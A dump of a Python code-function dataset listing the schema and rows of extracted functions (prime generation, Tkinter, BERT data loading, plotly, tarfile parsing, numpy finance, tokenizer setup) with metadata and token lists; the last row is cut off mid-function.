Dataset schema (column name, type, observed min/max):

    column              type           min    max
    ------------------  -------------  -----  ------
    nwo                 stringlengths  5      106
    sha                 stringlengths  40     40
    path                stringlengths  4      174
    language            stringclasses  1 value
    identifier          stringlengths  1      140
    parameters          stringlengths  0      87.7k
    argument_list       stringclasses  1 value
    return_statement    stringlengths  0      426k
    docstring           stringlengths  0      64.3k
    docstring_summary   stringlengths  0      26.3k
    docstring_tokens    list
    function            stringlengths  18     4.83M
    function_tokens     list
    url                 stringlengths  83     304
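Each row of the dataset is one extracted Python function, keyed by the columns above. As a sketch of how a consumer might handle a row (the record values are copied from the first row below; the `describe` helper is hypothetical, not part of the dataset):

```python
# One row of the dataset, keyed by the columns listed above.
# Values are copied from the primes.py row below; "function" is truncated
# here for brevity (the full text appears in the row itself).
record = {
    "nwo": "zhl2008/awd-platform",
    "sha": "0416b31abea29743387b10b3914581fbe8e7da5e",
    "path": "web_flaskbb/Python-2.7.9/Demo/scripts/primes.py",
    "language": "python",
    "identifier": "primes",
    "parameters": "(min, max)",
    "argument_list": "",
    "return_statement": "",
    "docstring": "",
    "docstring_summary": "",
    "docstring_tokens": [],
    "function": "def primes(min, max): ...",
    "function_tokens": ["def", "primes", "(", "min", ",", "max", ")"],
    "url": "https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/Python-2.7.9/Demo/scripts/primes.py#L5-L18",
}

def describe(rec):
    """One-line summary of a function record."""
    documented = bool(rec["docstring_summary"])
    return f'{rec["nwo"]} :: {rec["identifier"]}{rec["parameters"]} (documented: {documented})'

print(describe(record))
```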
----
nwo: zhl2008/awd-platform
sha: 0416b31abea29743387b10b3914581fbe8e7da5e
path: web_flaskbb/Python-2.7.9/Demo/scripts/primes.py
language: python
identifier: primes
parameters: (min, max)
docstring_tokens: []
function:

    def primes(min, max):
        if max >= 2 >= min:
            print 2
        primes = [2]
        i = 3
        while i <= max:
            for p in primes:
                if i % p == 0 or p*p > i:
                    break
            if i % p != 0:
                primes.append(i)
                if i >= min:
                    print i
            i += 2

function_tokens: [ "def", "primes", "(", "min", ",", "max", ")", ":", "if", "max", ">=", "2", ">=", "min", ":", "print", "2", "primes", "=", "[", "2", "]", "i", "=", "3", "while", "i", "<=", "max", ":", "for", "p", "in", "primes", ":", "if", "i", "%", "p", ...
url: https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/Python-2.7.9/Demo/scripts/primes.py#L5-L18
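The function in this row is Python 2 (bare `print` statements), so it will not run on a modern interpreter. A hedged Python 3 port for readers who want to try it (the name `primes_py3` and the returned list are my additions; the record's function only prints):

```python
def primes_py3(min_, max_):
    """Python 3 port of the row's primes(): print and return primes in [min_, max_]."""
    if max_ >= 2 >= min_:
        print(2)
    found = [2]          # known primes so far, used for trial division
    i = 3
    while i <= max_:
        for p in found:
            # Stop once a divisor is found, or once p*p exceeds i
            # (no prime factor can be larger than sqrt(i)).
            if i % p == 0 or p * p > i:
                break
        if i % p != 0:   # loop ended on p*p > i, so i is prime
            found.append(i)
            if i >= min_:
                print(i)
        i += 2           # even numbers > 2 are never prime
    return [n for n in found if min_ <= n <= max_]

print(primes_py3(10, 20))
```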
----
nwo: IronLanguages/main
sha: a949455434b1fda8c783289e897e78a9a0caabb5
path: External.LCA_RESTRICTED/Languages/CPython/27/Lib/lib-tk/Tkinter.py
language: python
identifier: Misc.pack_slaves
parameters: (self)
return_statement: return map(self._nametowidget, self.tk.splitlist(self.tk.call('pack', 'slaves', self._w)))
docstring: Return a list of all slaves of this widget in its packing order.
docstring_summary: Return a list of all slaves of this widget in its packing order.
docstring_tokens: [ "Return", "a", "list", "of", "all", "slaves", "of", "this", "widget", "in", "its", "packing", "order", "." ]
function:

    def pack_slaves(self):
        """Return a list of all slaves of this widget in its packing order."""
        return map(self._nametowidget,
                   self.tk.splitlist(
                       self.tk.call('pack', 'slaves', self._w)))

function_tokens: [ "def", "pack_slaves", "(", "self", ")", ":", "return", "map", "(", "self", ".", "_nametowidget", ",", "self", ".", "tk", ".", "splitlist", "(", "self", ".", "tk", ".", "call", "(", "'pack'", ",", "'slaves'", ",", "self", ".", "_w", ")", ")", ")" ]
url: https://github.com/IronLanguages/main/blob/a949455434b1fda8c783289e897e78a9a0caabb5/External.LCA_RESTRICTED/Languages/CPython/27/Lib/lib-tk/Tkinter.py#L1234-L1239
----
nwo: mlcommons/training
sha: 4a4d5a0b7efe99c680306b1940749211d4238a84
path: translation/tensorflow/bert/run_classifier.py
language: python
identifier: ColaProcessor.get_test_examples
parameters: (self, data_dir)
return_statement: return self._create_examples(self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")
docstring: See base class.
docstring_summary: See base class.
docstring_tokens: [ "See", "base", "class", "." ]
function:

    def get_test_examples(self, data_dir):
        """See base class."""
        return self._create_examples(
            self._read_tsv(os.path.join(data_dir, "test.tsv")), "test")

function_tokens: [ "def", "get_test_examples", "(", "self", ",", "data_dir", ")", ":", "return", "self", ".", "_create_examples", "(", "self", ".", "_read_tsv", "(", "os", ".", "path", ".", "join", "(", "data_dir", ",", "\"test.tsv\"", ")", ")", ",", "\"test\"", ")" ]
url: https://github.com/mlcommons/training/blob/4a4d5a0b7efe99c680306b1940749211d4238a84/translation/tensorflow/bert/run_classifier.py#L349-L352
----
nwo: plotly/plotly.py
sha: cfad7862594b35965c0e000813bd7805e8494a5b
path: packages/python/plotly/plotly/graph_objs/_histogram.py
language: python
identifier: Histogram.xbins
parameters: (self)
return_statement: return self["xbins"]
docstring:

    The 'xbins' property is an instance of XBins that may be specified as:
      - An instance of :class:`plotly.graph_objs.histogram.XBins`
      - A dict of string/value properties that will be passed to the XBins constructor

    Supported dict properties:

        end
            Sets the end value for the x axis bins. The last bin may not end exactly at this value, we increment the bin edge by `size` from `start` until we reach or exceed `end`. Defaults to the maximum data value. Like `start`, for dates use a date string, and for category data `end` is based on the category serial numbers.
        size
            Sets the size of each x axis bin. Default behavior: If `nbinsx` is 0 or omitted, we choose a nice round bin size such that the number of bins is about the same as the typical number of samples in each bin. If `nbinsx` is provided, we choose a nice round bin size giving no more than that many bins. For date data, use milliseconds or "M<n>" for months, as in `axis.dtick`. For category data, the number of categories to bin together (always defaults to 1). If multiple non-overlaying histograms share a subplot, the first explicit `size` is used and all others discarded. If no `size` is provided, the sample data from all traces is combined to determine `size` as described above.
        start
            Sets the starting value for the x axis bins. Defaults to the minimum data value, shifted down if necessary to make nice round values and to remove ambiguous bin edges. For example, if most of the data is integers we shift the bin edges 0.5 down, so a `size` of 5 would have a default `start` of -0.5, so it is clear that 0-4 are in the first bin, 5-9 in the second, but continuous data gets a start of 0 and bins [0,5), [5,10) etc. Dates behave similarly, and `start` should be a date string. For category data, `start` is based on the category serial numbers, and defaults to -0.5. If multiple non-overlaying histograms share a subplot, the first explicit `start` is used exactly and all others are shifted down (if necessary) to differ from that one by an integer number of bins.

    Returns
    -------
    plotly.graph_objs.histogram.XBins

docstring_summary:

    The 'xbins' property is an instance of XBins that may be specified as:
      - An instance of :class:`plotly.graph_objs.histogram.XBins`
      - A dict of string/value properties that will be passed to the XBins constructor

    Supported dict properties:

        end
            Sets the end value for the x axis bins. The last bin may not end exactly at this value, we increment the bin edge by `size` from `start` until we reach or exceed `end`. Defaults to the maximum data value. Like `start`, for dates use a date string, and for category data `end` is based on the category serial numbers.
        size
            Sets the size of each x axis bin. Default behavior: If `nbinsx` is 0 or omitted, we choose a nice round bin size such that the number of bins is about the same as the typical number of samples in each bin. If `nbinsx` is provided, we choose a nice round bin size giving no more than that many bins. For date data, use milliseconds or "M<n>" for months, as in `axis.dtick`. For category data, the number of categories to bin together (always defaults to 1). If multiple non-overlaying histograms share a subplot, the first explicit `size` is used and all others discarded. If no `size` is provided, the sample data from all traces is combined to determine `size` as described above.
        start
            Sets the starting value for the x axis bins. Defaults to the minimum data value, shifted down if necessary to make nice round values and to remove ambiguous bin edges. For example, if most of the data is integers we shift the bin edges 0.5 down, so a `size` of 5 would have a default `start` of -0.5, so it is clear that 0-4 are in the first bin, 5-9 in the second, but continuous data gets a start of 0 and bins [0,5), [5,10) etc. Dates behave similarly, and `start` should be a date string. For category data, `start` is based on the category serial numbers, and defaults to -0.5. If multiple non-overlaying histograms share a subplot, the first explicit `start` is used exactly and all others are shifted down (if necessary) to differ from that one by an integer number of bins.

docstring_tokens: [ "The", "xbins", "property", "is", "an", "instance", "of", "XBins", "that", "may", "be", "specified", "as", ":", "-", "An", "instance", "of", ":", "class", ":", "plotly", ".", "graph_objs", ".", "histogram", ".", "XBins", "-", "A", "dict", "of", "string...
function:

    def xbins(self):
        """
        The 'xbins' property is an instance of XBins
        that may be specified as:
          - An instance of :class:`plotly.graph_objs.histogram.XBins`
          - A dict of string/value properties that will be passed
            to the XBins constructor

            Supported dict properties:

                end
                    Sets the end value for the x axis bins. The last bin may not end exactly at this value, we increment the bin edge by `size` from `start` until we reach or exceed `end`. Defaults to the maximum data value. Like `start`, for dates use a date string, and for category data `end` is based on the category serial numbers.
                size
                    Sets the size of each x axis bin. Default behavior: If `nbinsx` is 0 or omitted, we choose a nice round bin size such that the number of bins is about the same as the typical number of samples in each bin. If `nbinsx` is provided, we choose a nice round bin size giving no more than that many bins. For date data, use milliseconds or "M<n>" for months, as in `axis.dtick`. For category data, the number of categories to bin together (always defaults to 1). If multiple non-overlaying histograms share a subplot, the first explicit `size` is used and all others discarded. If no `size` is provided, the sample data from all traces is combined to determine `size` as described above.
                start
                    Sets the starting value for the x axis bins. Defaults to the minimum data value, shifted down if necessary to make nice round values and to remove ambiguous bin edges. For example, if most of the data is integers we shift the bin edges 0.5 down, so a `size` of 5 would have a default `start` of -0.5, so it is clear that 0-4 are in the first bin, 5-9 in the second, but continuous data gets a start of 0 and bins [0,5), [5,10) etc. Dates behave similarly, and `start` should be a date string. For category data, `start` is based on the category serial numbers, and defaults to -0.5. If multiple non-overlaying histograms share a subplot, the first explicit `start` is used exactly and all others are shifted down (if necessary) to differ from that one by an integer number of bins.

        Returns
        -------
        plotly.graph_objs.histogram.XBins
        """
        return self["xbins"]

function_tokens: [ "def", "xbins", "(", "self", ")", ":", "return", "self", "[", "\"xbins\"", "]" ]
url: https://github.com/plotly/plotly.py/blob/cfad7862594b35965c0e000813bd7805e8494a5b/packages/python/plotly/plotly/graph_objs/_histogram.py#L1730-L1789
----
nwo: openedx/edx-platform
sha: 68dd185a0ab45862a2a61e0f803d7e03d2be71b5
path: lms/djangoapps/instructor_task/tasks_helper/grades.py
language: python
identifier: CourseGradeReport._upload
parameters: (self, context, success_headers, success_rows, error_headers, error_rows)
docstring: Creates and uploads a CSV for the given headers and rows.
docstring_summary: Creates and uploads a CSV for the given headers and rows.
docstring_tokens: [ "Creates", "and", "uploads", "a", "CSV", "for", "the", "given", "headers", "and", "rows", "." ]
function:

    def _upload(self, context, success_headers, success_rows, error_headers, error_rows):
        """
        Creates and uploads a CSV for the given headers and rows.
        """
        date = datetime.now(UTC)
        upload_csv_to_report_store(
            [success_headers] + success_rows,
            context.upload_filename,
            context.course_id,
            date,
            parent_dir=context.upload_parent_dir
        )
        if len(error_rows) > 0:
            upload_csv_to_report_store(
                [error_headers] + error_rows,
                '{}_err'.format(context.upload_filename),
                context.course_id,
                date,
                parent_dir=context.upload_parent_dir
            )

function_tokens: [ "def", "_upload", "(", "self", ",", "context", ",", "success_headers", ",", "success_rows", ",", "error_headers", ",", "error_rows", ")", ":", "date", "=", "datetime", ".", "now", "(", "UTC", ")", "upload_csv_to_report_store", "(", "[", "success_headers", "]",...
url: https://github.com/openedx/edx-platform/blob/68dd185a0ab45862a2a61e0f803d7e03d2be71b5/lms/djangoapps/instructor_task/tasks_helper/grades.py#L483-L502
----
nwo: beeware/ouroboros
sha: a29123c6fab6a807caffbb7587cf548e0c370296
path: ouroboros/tarfile.py
language: python
identifier: TarInfo._proc_gnusparse_01
parameters: (self, next, pax_headers)
docstring: Process a GNU tar extended sparse header, version 0.1.
docstring_summary: Process a GNU tar extended sparse header, version 0.1.
docstring_tokens: [ "Process", "a", "GNU", "tar", "extended", "sparse", "header", "version", "0", ".", "1", "." ]
function:

    def _proc_gnusparse_01(self, next, pax_headers):
        """Process a GNU tar extended sparse header, version 0.1.
        """
        sparse = [int(x) for x in pax_headers["GNU.sparse.map"].split(",")]
        next.sparse = list(zip(sparse[::2], sparse[1::2]))

function_tokens: [ "def", "_proc_gnusparse_01", "(", "self", ",", "next", ",", "pax_headers", ")", ":", "sparse", "=", "[", "int", "(", "x", ")", "for", "x", "in", "pax_headers", "[", "\"GNU.sparse.map\"", "]", ".", "split", "(", "\",\"", ")", "]", "next", ".", "sparse",...
url: https://github.com/beeware/ouroboros/blob/a29123c6fab6a807caffbb7587cf548e0c370296/ouroboros/tarfile.py#L1296-L1300
----
nwo: IOActive/XDiFF
sha: 552d3394e119ca4ced8115f9fd2d7e26760e40b1
path: classes/webserver.py
language: python
identifier: WebServer.stop_web_server
parameters: (self)
docstring: Web server shutdown when closing the fuzzer
docstring_summary: Web server shutdown when closing the fuzzer
docstring_tokens: [ "Web", "server", "shutdown", "when", "closing", "the", "fuzzer" ]
function:

    def stop_web_server(self):
        """Web server shutdown when closing the fuzzer"""
        if self.server:
            self.settings['logger'].debug("Shutting down Web Server...")
            self.server.shutdown()

function_tokens: [ "def", "stop_web_server", "(", "self", ")", ":", "if", "self", ".", "server", ":", "self", ".", "settings", "[", "'logger'", "]", ".", "debug", "(", "\"Shutting down Web Server...\"", ")", "self", ".", "server", ".", "shutdown", "(", ")" ]
url: https://github.com/IOActive/XDiFF/blob/552d3394e119ca4ced8115f9fd2d7e26760e40b1/classes/webserver.py#L125-L129
----
nwo: benediktschmitt/py-ts3
sha: 043a6a896169d39464f6f754e2afd300f74eefa5
path: ts3/response.py
language: python
identifier: TS3Response._parse_item
parameters: (self, item)
return_statement: return properties
docstring:

    >>> parse_item(b'key0=val0 key1=val1')
    {'key0': 'val0', 'key1': 'val1'}

docstring_summary:

    >>> parse_item(b'key0=val0 key1=val1')
    {'key0': 'val0', 'key1': 'val1'}

docstring_tokens: [ ">>>", "parse_item", "(", "b", "key0", "=", "val0", "key1", "=", "val1", ")", "{", "key0", ":", "val0", "key1", ":", "val1", "}" ]
function:

    def _parse_item(self, item):
        """
        >>> parse_item(b'key0=val0 key1=val1')
        {'key0': 'val0', 'key1': 'val1'}
        """
        properties = item.split()
        properties = dict(self._parse_property(p) for p in properties)
        return properties

function_tokens: [ "def", "_parse_item", "(", "self", ",", "item", ")", ":", "properties", "=", "item", ".", "split", "(", ")", "properties", "=", "dict", "(", "self", ".", "_parse_property", "(", "p", ")", "for", "p", "in", "properties", ")", "return", "properties" ]
url: https://github.com/benediktschmitt/py-ts3/blob/043a6a896169d39464f6f754e2afd300f74eefa5/ts3/response.py#L254-L261
----
nwo: CJWorkbench/cjworkbench
sha: e0b878d8ff819817fa049a4126efcbfcec0b50e6
path: cjwstate/models/module_registry.py
language: python
identifier: download_module_zipfile
parameters: (tempdir: Path, module_id: ModuleId, version: ModuleVersion, *, deprecated_spec: Dict[str, Any], deprecated_js_module: str)
return_statement: return ret
docstring:

    Produce a local-path ModuleZipfile by downloading from s3.

    Raise `RuntimeError` (_from_ another kind of error -- `FileNotFoundError`, `KeyError`, `ValueError`, `SyntaxError`, `BadZipFile`, `UnicodeDecodeError` or more) if the zipfile is not a valid Workbench module. We spend the time testing the zipfile for validity because A) it's good to catch errors quickly; and B) fetcher, renderer and server all need to execute code on each module, so they're destined to validate the module anyway.

    The zipfile is always written to "{tempdir}/{module_id}.{version}.zip".

    This function is not re-entrant when called with the same parameters. Callers may use locks to avoid trying to download the same data multiple times.

docstring_summary: Produce a local-path ModuleZipfile by downloading from s3.
docstring_tokens: [ "Produce", "a", "local", "-", "path", "ModuleZipfile", "by", "downloading", "from", "s3", "." ]
function:

    def download_module_zipfile(
        tempdir: Path,
        module_id: ModuleId,
        version: ModuleVersion,
        *,
        deprecated_spec: Dict[str, Any],
        deprecated_js_module: str,
    ) -> ModuleZipfile:
        """Produce a local-path ModuleZipfile by downloading from s3.

        Raise `RuntimeError` (_from_ another kind of error -- `FileNotFoundError`,
        `KeyError`, `ValueError`, `SyntaxError`, `BadZipFile`, `UnicodeDecodeError`
        or more) if the zipfile is not a valid Workbench module. We spend the time
        testing the zipfile for validity because A) it's good to catch errors
        quickly; and B) fetcher, renderer and server all need to execute code on
        each module, so they're destined to validate the module anyway.

        The zipfile is always written to "{tempdir}/{module_id}.{version}.zip".

        This function is not re-entrant when called with the same parameters.
        Callers may use locks to avoid trying to download the same data multiple
        times.
        """
        logger.info("download_module_zipfile(%s.%s.zip)", module_id, version)

        tempdir.mkdir(parents=True, exist_ok=True)

        zippath = tempdir / ("%s.%s.zip" % (module_id, version))
        try:
            # raise FileNotFoundError
            s3.download(
                s3.ExternalModulesBucket,
                "%s/%s.%s.zip" % (module_id, module_id, version),
                zippath,
            )
        except FileNotFoundError as original_error:
            raise RuntimeError from original_error

        ret = ModuleZipfile(zippath)  # raise ZipfileError
        try:
            # raise KeyError or SyntaxError
            compiled_module = ret.compile_code_without_executing()
            ret.get_spec()  # raise KeyError or ValueError
            cjwstate.modules.kernel.validate(compiled_module)  # raise ModuleError
        except Exception as err:
            raise RuntimeError from err

        return ret

function_tokens: [ "def", "download_module_zipfile", "(", "tempdir", ":", "Path", ",", "module_id", ":", "ModuleId", ",", "version", ":", "ModuleVersion", ",", "*", ",", "deprecated_spec", ":", "Dict", "[", "str", ",", "Any", "]", ",", "deprecated_js_module", ":", "str", ",", ...
url: https://github.com/CJWorkbench/cjworkbench/blob/e0b878d8ff819817fa049a4126efcbfcec0b50e6/cjwstate/models/module_registry.py#L163-L209
----
nwo: entropy1337/infernal-twin
sha: 10995cd03312e39a48ade0f114ebb0ae3a711bb8
path: Modules/build/pip/build/lib.linux-i686-2.7/pip/_vendor/ipaddress.py
language: python
identifier: _BaseV4._string_from_ip_int
parameters: (cls, ip_int)
return_statement: return '.'.join(_compat_str(struct.unpack(b'!B', b)[0] if isinstance(b, bytes) else b) for b in _compat_to_bytes(ip_int, 4, 'big'))
docstring:

    Turns a 32-bit integer into dotted decimal notation.

    Args:
        ip_int: An integer, the IP address.

    Returns:
        The IP address as a string in dotted decimal notation.

docstring_summary: Turns a 32-bit integer into dotted decimal notation.
docstring_tokens: [ "Turns", "a", "32", "-", "bit", "integer", "into", "dotted", "decimal", "notation", "." ]
function:

    def _string_from_ip_int(cls, ip_int):
        """Turns a 32-bit integer into dotted decimal notation.

        Args:
            ip_int: An integer, the IP address.

        Returns:
            The IP address as a string in dotted decimal notation.

        """
        return '.'.join(_compat_str(struct.unpack(b'!B', b)[0]
                                    if isinstance(b, bytes)
                                    else b)
                        for b in _compat_to_bytes(ip_int, 4, 'big'))

function_tokens: [ "def", "_string_from_ip_int", "(", "cls", ",", "ip_int", ")", ":", "return", "'.'", ".", "join", "(", "_compat_str", "(", "struct", ".", "unpack", "(", "b'!B'", ",", "b", ")", "[", "0", "]", "if", "isinstance", "(", "b", ",", "bytes", ")", "else", ...
url: https://github.com/entropy1337/infernal-twin/blob/10995cd03312e39a48ade0f114ebb0ae3a711bb8/Modules/build/pip/build/lib.linux-i686-2.7/pip/_vendor/ipaddress.py#L1309-L1322
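This row's `_string_from_ip_int` is a Python-2/3 compatibility shim for a conversion the standard library now does directly. A quick check of the same integer-to-dotted-decimal conversion using only stdlib calls (the helper name here is mine, not from the record):

```python
import ipaddress
import struct

def string_from_ip_int(ip_int):
    """Dotted-decimal string from a 32-bit integer, same idea as the row's helper."""
    # Pack the integer as 4 big-endian bytes, then join the four octets.
    return '.'.join(str(octet) for octet in struct.pack('!I', ip_int))

print(string_from_ip_int(3232235777))     # the stdlib agrees:
print(ipaddress.IPv4Address(3232235777))  # same dotted-decimal string
```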
----
nwo: Pymol-Scripts/Pymol-script-repo
sha: bcd7bb7812dc6db1595953dfa4471fa15fb68c77
path: modules/pdb2pqr/contrib/numpy-1.1.0/numpy/lib/financial.py
language: python
identifier: pv
parameters: (rate, nper, pmt, fv=0.0, when='end')
return_statement: return -(fv + pmt*fact)/temp
docstring: Number of periods found by solving the equation
docstring_summary: Number of periods found by solving the equation
docstring_tokens: [ "Number", "of", "periods", "found", "by", "solving", "the", "equation" ]
function:

    def pv(rate, nper, pmt, fv=0.0, when='end'):
        """Number of periods found by solving the equation
        """
        when = _convert_when(when)
        rate, nper, pmt, fv, when = map(np.asarray, [rate, nper, pmt, fv, when])
        temp = (1+rate)**nper
        miter = np.broadcast(rate, nper, pmt, fv, when)
        zer = np.zeros(miter.shape)
        fact = np.where(rate == zer, nper+zer, (1+rate*when)*(temp-1)/rate+zer)
        return -(fv + pmt*fact)/temp

function_tokens: [ "def", "pv", "(", "rate", ",", "nper", ",", "pmt", ",", "fv", "=", "0.0", ",", "when", "=", "'end'", ")", ":", "when", "=", "_convert_when", "(", "when", ")", "rate", ",", "nper", ",", "pmt", ",", "fv", ",", "when", "=", "map", "(", "np", "."...
url: https://github.com/Pymol-Scripts/Pymol-script-repo/blob/bcd7bb7812dc6db1595953dfa4471fa15fb68c77/modules/pdb2pqr/contrib/numpy-1.1.0/numpy/lib/financial.py#L150-L159
----
nwo: ArduPilot/pymavlink
sha: 9d6ea618e8d0622bee95fa902b6251882e225afb
path: quaternion.py
language: python
identifier: Quaternion.transform
parameters: (self, v3)
docstring:

    Calculates the vector transformed by this quaternion
    :param v3: Vector3 to be transformed
    :returns: transformed vector

docstring_summary:

    Calculates the vector transformed by this quaternion
    :param v3: Vector3 to be transformed
    :returns: transformed vector

docstring_tokens: [ "Calculates", "the", "vector", "transformed", "by", "this", "quaternion", ":", "param", "v3", ":", "Vector3", "to", "be", "transformed", ":", "returns", ":", "transformed", "vector" ]
function:

    def transform(self, v3):
        """
        Calculates the vector transformed by this quaternion
        :param v3: Vector3 to be transformed
        :returns: transformed vector
        """
        if isinstance(v3, Vector3):
            t = super(Quaternion, self).transform([v3.x, v3.y, v3.z])
            return Vector3(t[0], t[1], t[2])
        elif len(v3) == 3:
            return super(Quaternion, self).transform(v3)
        else:
            raise TypeError("param v3 is not a vector type")

function_tokens: [ "def", "transform", "(", "self", ",", "v3", ")", ":", "if", "isinstance", "(", "v3", ",", "Vector3", ")", ":", "t", "=", "super", "(", "Quaternion", ",", "self", ")", ".", "transform", "(", "[", "v3", ".", "x", ",", "v3", ".", "y", ",", "v3", ...
url: https://github.com/ArduPilot/pymavlink/blob/9d6ea618e8d0622bee95fa902b6251882e225afb/quaternion.py#L539-L551
----
nwo: AppScale/gts
sha: 46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9
path: AppServer/lib/django-1.2/django/template/loader.py
language: python
identifier: get_template
parameters: (template_name)
return_statement: return template
docstring: Returns a compiled Template object for the given template name, handling template inheritance recursively.
docstring_summary: Returns a compiled Template object for the given template name, handling template inheritance recursively.
docstring_tokens: [ "Returns", "a", "compiled", "Template", "object", "for", "the", "given", "template", "name", "handling", "template", "inheritance", "recursively", "." ]
function:

    def get_template(template_name):
        """
        Returns a compiled Template object for the given template name,
        handling template inheritance recursively.
        """
        template, origin = find_template(template_name)
        if not hasattr(template, 'render'):
            # template needs to be compiled
            template = get_template_from_string(template, origin, template_name)
        return template

function_tokens: [ "def", "get_template", "(", "template_name", ")", ":", "template", ",", "origin", "=", "find_template", "(", "template_name", ")", "if", "not", "hasattr", "(", "template", ",", "'render'", ")", ":", "# template needs to be compiled", "template", "=", "get_template...
url: https://github.com/AppScale/gts/blob/46f909cf5dc5ba81faf9d81dc9af598dcf8a82a9/AppServer/lib/django-1.2/django/template/loader.py#L152-L161
----
nwo: thaines/helit
sha: 04bd36ee0fb6b762c63d746e2cd8813641dceda9
path: lda_gibbs/document.py
language: python
identifier: Document.dupWords
parameters: (self)
return_statement: return self.wordCount
docstring: Returns the number of words in the document, counting duplicates.
docstring_summary: Returns the number of words in the document, counting duplicates.
docstring_tokens: [ "Returns", "the", "number", "of", "words", "in", "the", "document", "counting", "duplicates", "." ]
function:

    def dupWords(self):
        """Returns the number of words in the document, counting duplicates."""
        return self.wordCount

function_tokens: [ "def", "dupWords", "(", "self", ")", ":", "return", "self", ".", "wordCount" ]
url: https://github.com/thaines/helit/blob/04bd36ee0fb6b762c63d746e2cd8813641dceda9/lda_gibbs/document.py#L83-L85
----
nwo: google-research/language
sha: 61fa7260ac7d690d11ef72ca863e45a37c0bdc80
path: language/emql/util.py
language: python
identifier: compute_average_precision_at_k
parameters: (logits, labels, k)
return_statement: return average_precision_at_k
docstring:

    Compute average precision at k.

    Args:
      logits: batch_size, nun_candidate
      labels: batch_size, num_candidate
      k: scalar

    Returns:
      average_precision_at_k

docstring_summary: Compute average precision at k.
docstring_tokens: [ "Compute", "average", "precision", "at", "k", "." ]
function:

    def compute_average_precision_at_k(logits, labels, k):
        """Compute average precision at k.

        Args:
          logits: batch_size, nun_candidate
          labels: batch_size, num_candidate
          k: scalar

        Returns:
          average_precision_at_k
        """
        _, topk = tf.nn.top_k(logits, k)  # batch_size, k
        true_positives = tf.gather(labels, topk, batch_dims=1)  # batch_size, k
        # e.g. [[0, 1, 1, 0], [1, 0, 0, 1]]
        upper_triangle_matrix = tf.constant(
            np.triu(np.ones([k, k])), dtype=tf.float32)  # k, k
        # e.g. [[1,1,1,1], [0,1,1,1], [0,0,1,1], [0,0,0,1]]
        upper_triangle_matrix /= tf.reduce_sum(
            upper_triangle_matrix, axis=0, keepdims=True)  # k, k
        # e.g. [[1,1/2,1/3,1/4], [0,1/2,1/3,1/4], [0,0,1/3,1/4], [0,0,0,1/4]]
        recall_at_k = tf.matmul(true_positives, upper_triangle_matrix)  # batch_size, k
        # e.g. [[0, 1/2, 2/3, 2/4], [1, 1/2, 1/3, 2/4]]
        positive_recall_at_k = true_positives * recall_at_k  # batch_size, k
        # e.g. [[0, 1/2, 2/3, 0], [1, 0, 0, 2/4]]
        num_true_positive = tf.reduce_sum(true_positives, axis=1)  # batch_size
        # e.g. [2, 2]
        num_true_positive_replace_0_with_1 = tf.where(
            num_true_positive > 0, num_true_positive,
            tf.ones(tf.shape(num_true_positive), dtype=tf.float32))
        average_precision_at_k = \
            tf.reduce_sum(positive_recall_at_k, axis=1) \
            / num_true_positive_replace_0_with_1  # batch_size
        # e.g. [(1/2 + 2/3) / 2, (1 + 2/4) / 2]
        return average_precision_at_k

function_tokens: [ "def", "compute_average_precision_at_k", "(", "logits", ",", "labels", ",", "k", ")", ":", "_", ",", "topk", "=", "tf", ".", "nn", ".", "top_k", "(", "logits", ",", "k", ")", "# batch_size, k", "true_positives", "=", "tf", ".", "gather", "(", "labels", ...
url: https://github.com/google-research/language/blob/61fa7260ac7d690d11ef72ca863e45a37c0bdc80/language/emql/util.py#L97-L140
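The `e.g.` comments in this row trace the arithmetic for the true-positive patterns `[[0, 1, 1, 0], [1, 0, 0, 1]]`. The same average-precision-at-k arithmetic can be sanity-checked in plain Python, without TensorFlow (the function name here is mine, not from the record):

```python
def average_precision_at_k(ranked_hits):
    """AP@k for one query.

    ranked_hits: list of 0/1 flags for the top-k candidates in rank order.
    Averages precision over the ranks at which hits occur, matching the
    row's tf implementation (which divides by the number of hits in top-k).
    """
    hits = 0
    score = 0.0
    for rank, hit in enumerate(ranked_hits, start=1):
        if hit:
            hits += 1
            score += hits / rank  # precision at this rank
    return score / hits if hits else 0.0

# Reproduces the worked example in the row's comments:
print(average_precision_at_k([0, 1, 1, 0]))  # (1/2 + 2/3) / 2
print(average_precision_at_k([1, 0, 0, 1]))  # (1 + 2/4) / 2
```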
----
nwo: airsplay/lxmert
sha: 0db1182b9030da3ce41f17717cc628e1cd0a95d5
path: src/lxrt/tokenization.py
language: python
identifier: BertTokenizer.__init__
parameters: (self, vocab_file, do_lower_case=True, max_len=None, do_basic_tokenize=True, never_split=("[UNK]", "[SEP]", "[PAD]", "[CLS]", "[MASK]"))
docstring:

    Constructs a BertTokenizer.

    Args:
      vocab_file: Path to a one-wordpiece-per-line vocabulary file
      do_lower_case: Whether to lower case the input
        Only has an effect when do_wordpiece_only=False
      do_basic_tokenize: Whether to do basic tokenization before wordpiece.
      max_len: An artificial maximum length to truncate tokenized sequences to;
        Effective maximum length is always the minimum of this value (if specified)
        and the underlying BERT model's sequence length.
      never_split: List of tokens which will never be split during tokenization.
        Only has an effect when do_wordpiece_only=False

docstring_summary: Constructs a BertTokenizer.
docstring_tokens: [ "Constructs", "a", "BertTokenizer", "." ]
function:

    def __init__(self, vocab_file, do_lower_case=True, max_len=None, do_basic_tokenize=True,
                 never_split=("[UNK]", "[SEP]", "[PAD]", "[CLS]", "[MASK]")):
        """Constructs a BertTokenizer.

        Args:
          vocab_file: Path to a one-wordpiece-per-line vocabulary file
          do_lower_case: Whether to lower case the input
            Only has an effect when do_wordpiece_only=False
          do_basic_tokenize: Whether to do basic tokenization before wordpiece.
          max_len: An artificial maximum length to truncate tokenized sequences to;
            Effective maximum length is always the minimum of this value (if specified)
            and the underlying BERT model's sequence length.
          never_split: List of tokens which will never be split during tokenization.
            Only has an effect when do_wordpiece_only=False
        """
        if not os.path.isfile(vocab_file):
            raise ValueError(
                "Can't find a vocabulary file at path '{}'. To load the vocabulary from a Google pretrained "
                "model use `tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`".format(vocab_file))
        self.vocab = load_vocab(vocab_file)
        self.ids_to_tokens = collections.OrderedDict(
            [(ids, tok) for tok, ids in self.vocab.items()])
        self.do_basic_tokenize = do_basic_tokenize
        if do_basic_tokenize:
            self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case,
                                                  never_split=never_split)
